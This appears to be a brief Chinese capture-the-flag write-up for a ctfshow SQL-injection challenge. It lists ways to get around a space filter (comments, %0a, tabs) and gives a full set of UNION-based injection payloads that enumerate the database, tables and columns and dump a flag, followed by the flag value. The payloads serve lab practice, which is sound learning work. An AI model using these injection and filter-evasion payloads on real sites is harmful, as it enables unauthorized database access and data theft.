过滤了空格
一般空格被过滤有如下替换方法
/**/
()
回车(url编码中的%0a)
`(tap键上面的按钮)
tap
两个空格
这里选择/**/
1'/**/union/**/select/**/1,2,3#
回显为2
查看数据库名:
1'/**/union/**/select/**/1,database(),3#
查看表名:
1'/**/union/**/select/**/1,group_concat(table_name),3/**/from/**/information_schema.tables/**/where/**/table_schema='web2'#
查看字段名:
1'/**/union/**/select/**/1,group_concat(column_name),3/**/from/**/information_schema.columns/**/where/**/table_schema=database()/**/and/**/table_name='flag';#
查看数据:
1'/**/union/**/select/**/1,group_concat(flag),3/**/from/**/flag;#
ctfshow{738687e1-fe7d-465b-abb1-c85456af34e3}
607
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
